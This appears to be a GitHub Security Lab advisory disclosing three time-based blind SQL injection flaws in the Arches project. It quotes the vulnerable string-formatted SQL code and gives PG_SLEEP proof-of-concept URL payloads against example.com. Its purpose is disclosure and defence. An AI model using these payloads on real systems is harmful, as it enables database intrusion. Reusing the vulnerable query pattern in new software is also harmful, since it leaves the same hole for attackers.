Coordinated Disclosure Timeline
- 2022-09-08: Sent email to contact@archesproject.org
- 2022-09-08: Received an automatic reply
- 2022-10-10: Sent an email with request for an update
- 2022-10-28: Received a reply about a fix. Asked the maintainer to create an advisory
- 2022-11-10: The fix is published
Summary
The Arches project contains multiple blind SQL injection vulnerabilities, that allow an attacker to query the underlying database.
Product
Arches
Tested Version
Details
All issues identified in this report are blind SQL injections found by using CodeQL SQL injection query available here. For more information see the CodeQL documentation about SQL injection query. By supplying a specially crafted payload to the given below parameters and endpoints, an attacker can inject arbitrary SQL queries to be executed. Since these are blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can infer if the query execution returned true or false, execute queries, and gain information about the data in the database.
For more information about testing applications for SQL injection see OWASP Web Security Testing Guide - Testing for SQL injection
Issue 1: Time-based blind SQL injection in paged_dropdown
(GHSL-2022-070
)
The paged_dropdown
endpoint creates a SQL query using the user-controlled query
parameter value:
sql = """
SELECT value, valueid
FROM
(
SELECT *, CASE WHEN LOWER(languageid) = '{languageid}' THEN 10
WHEN LOWER(languageid) like '{short_languageid}%' THEN 5
ELSE 0
END score
FROM values
) as vals
WHERE LOWER(value)='{query}' AND score > 0
AND valuetype in ('prefLabel')
ORDER BY score desc limit 1
"""
languageid = get_language().lower()
sql = sql.format(query=query.lower(), languageid=languageid, short_languageid=languageid.split("-")[0])
cursor = connection.cursor()
cursor.execute(sql)
PoC
Access the concepts/paged_dropdown
endpoint and supply the conceptid
parameter with a valid UUID (eg: 07864703-481b-42c5-91a8-803cc63f59d0
) and the query
parameter with the payload ' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo
.
Using example.com
as an example domain, the payload would look like below:
example.com/concepts/paged_dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0&query=' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo
Resources
- Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/views/concept.py#L407-L425
Issue 2: Time-based blind SQL injection in get_child_edges
(GHSL-2022-071
)
The /concepts/paged_dropdown
endpoint creates a SQL query using the user-controlled query
parameter value:
if order_hierarchically:
sql = """
WITH RECURSIVE
ordered_relationships AS (
#[code skipped for readability]
FROM relations r
WHERE r.conceptidfrom = '{conceptid}'
and ({relationtypes})
ORDER BY sortorder, valuesto
)
#[code skipped for readability]
children AS (
SELECT r.conceptidfrom, r.conceptidto,
to_char(row_number() OVER (), 'fm000000') as row,
r.collector,
1 AS depth ---|NonRecursive Part
FROM ordered_relationships r
WHERE r.conceptidfrom = '{conceptid}'
and ({relationtypes})
UNION
SELECT r.conceptidfrom, r.conceptidto,
row || '-' || to_char(row_number() OVER (), 'fm000000'),
r.collector,
depth+1 ---|RecursivePart
FROM ordered_relationships r
JOIN children b ON(b.conceptidto = r.conceptidfrom)
WHERE ({relationtypes})
{depth_limit}
)
{subquery}
#[code skipped for readability]
"""
subquery = (
""", results as (
SELECT c.conceptidfrom, c.conceptidto, c.row, c.depth, c.collector
FROM children c
JOIN values ON(values.conceptid = c.conceptidto)
WHERE LOWER(values.value) like '%%%s%%'
AND values.valuetype in ('prefLabel')
UNION
SELECT c.conceptidfrom, c.conceptidto, c.row, c.depth, c.collector
FROM children c
JOIN results r on (r.conceptidfrom=c.conceptidto)
)"""
% query.lower()
if query is not None
else ""
)
recursive_table = "results" if query else "children"
sql = sql.format(
conceptid=conceptid,
relationtypes=relationtypes,
child_valuetypes=child_valuetypes,
parent_valuetype=parent_valuetype,
depth_limit=depth_limit,
limit_clause=limit_clause,
subquery=subquery,
recursive_table=recursive_table,
languageid=languageid,
short_languageid=languageid.split("-")[0],
default_languageid=settings.LANGUAGE_CODE,
)
else:
sql = """
WITH RECURSIVE
children AS (
SELECT r.conceptidfrom, r.conceptidto, r.relationtype, 1 AS depth
FROM relations r
WHERE r.conceptidfrom = '{conceptid}'
AND ({relationtypes})
UNION
SELECT r.conceptidfrom, r.conceptidto, r.relationtype, depth+1
FROM relations r
JOIN children c ON(c.conceptidto = r.conceptidfrom)
WHERE ({relationtypes})
{depth_limit}
),
results AS (
#[code skipped for readability]
)
SELECT distinct {columns}
FROM results {limit_clause}
"""
if not columns:
columns = """
conceptidfrom::text, conceptidto::text,
valuefrom, valueto,
valueidfrom::text, valueidto::text,
valuetypefrom, valuetypeto,
languagefrom, languageto,
categoryfrom, categoryto
"""
sql = sql.format(
conceptid=conceptid,
relationtypes=relationtypes,
child_valuetypes=child_valuetypes,
columns=columns,
depth_limit=depth_limit,
limit_clause=limit_clause,
)
cursor = connection.cursor()
cursor.execute(sql)
rows = cursor.fetchall()
return rows
The conceptid
parameter is also passed to the query, on which there is performed UUID input validation on line 503-506. Due to the validation, the parameter is not vulnerable to SQL injection, but it would still be good practice to change all the below cases to use prepared statements, as described in the remediation section of this report.
PoC
Access the concepts/paged_dropdown
endpoint and supply the query
parameter with payload 'and 1=(select 1 from pg_sleep(10)) and 'a%'='a
and the conceptid
parameter with a valid UUID, f.ex. 07864703-481b-42c5-91a8-803cc63f59d0
.
Using example.com
as an example domain, the payload would look like below:
example.com/concepts/paged_dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0&query='and 1=(select 1 from pg_sleep(10)) and 'a%'='a
Resources
- Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/models/concept.py#L483-L725
Issue 3: Time-based blind SQL injection in get_e55_domain
(GHSL-2022-072
)
The /concepts/dropdown
endpoint creates a SQL query using the user-controlled conceptid
parameter value:
sql = """
WITH RECURSIVE children AS (
SELECT d.conceptidfrom, d.conceptidto, c2.value, c2.valueid as valueid, c.value as valueto, c.valueid as valueidto, c.valuetype as vtype, 1 AS depth, array[d.conceptidto] AS conceptpath, array[c.valueid] AS idpath ---|NonRecursive Part
FROM relations d
JOIN values c ON(c.conceptid = d.conceptidto)
JOIN values c2 ON(c2.conceptid = d.conceptidfrom)
WHERE d.conceptidfrom = '{0}'
and c2.valuetype = 'prefLabel'
and c.valuetype in ('prefLabel', 'sortorder', 'collector')
and (d.relationtype = 'member' or d.relationtype = 'hasTopConcept')
UNION
SELECT d.conceptidfrom, d.conceptidto, v2.value, v2.valueid as valueid, v.value as valueto, v.valueid as valueidto, v.valuetype as vtype, depth+1, (conceptpath || d.conceptidto), (idpath || v.valueid) ---|RecursivePart
FROM relations d
JOIN children b ON(b.conceptidto = d.conceptidfrom)
JOIN values v ON(v.conceptid = d.conceptidto)
JOIN values v2 ON(v2.conceptid = d.conceptidfrom)
WHERE v2.valuetype = 'prefLabel'
and v.valuetype in ('prefLabel','sortorder', 'collector')
and (d.relationtype = 'member' or d.relationtype = 'hasTopConcept')
) SELECT conceptidfrom::text, conceptidto::text, value, valueid::text, valueto, valueidto::text, depth, idpath::text, conceptpath::text, vtype FROM children ORDER BY depth, conceptpath;
""".format(
conceptid
)
#[code skipped for readability]
cursor.execute(sql)
PoC
To test the vulnerability, access the concepts/dropdown
endpoint and supply the conceptid
parameter with a valid UUID, f.ex. 07864703-481b-42c5-91a8-803cc63f59d0
and then the payload ' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo
.
Using example.com
as an example domain, the payload would look like below:
example.com/concepts/dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo
Resources
- Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/models/concept.py#L1172-L1217
Impact
This issues may lead to Information Disclosure
and possibility to execute SELECT queries on the database.
CVE
- CVE-2022-41892
Credit
These issues were discovered and reported by GHSL team member @sylwia-budzynska.
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2022-070
, GHSL-2022-071
, or GHSL-2022-072
in any communication regarding these issues.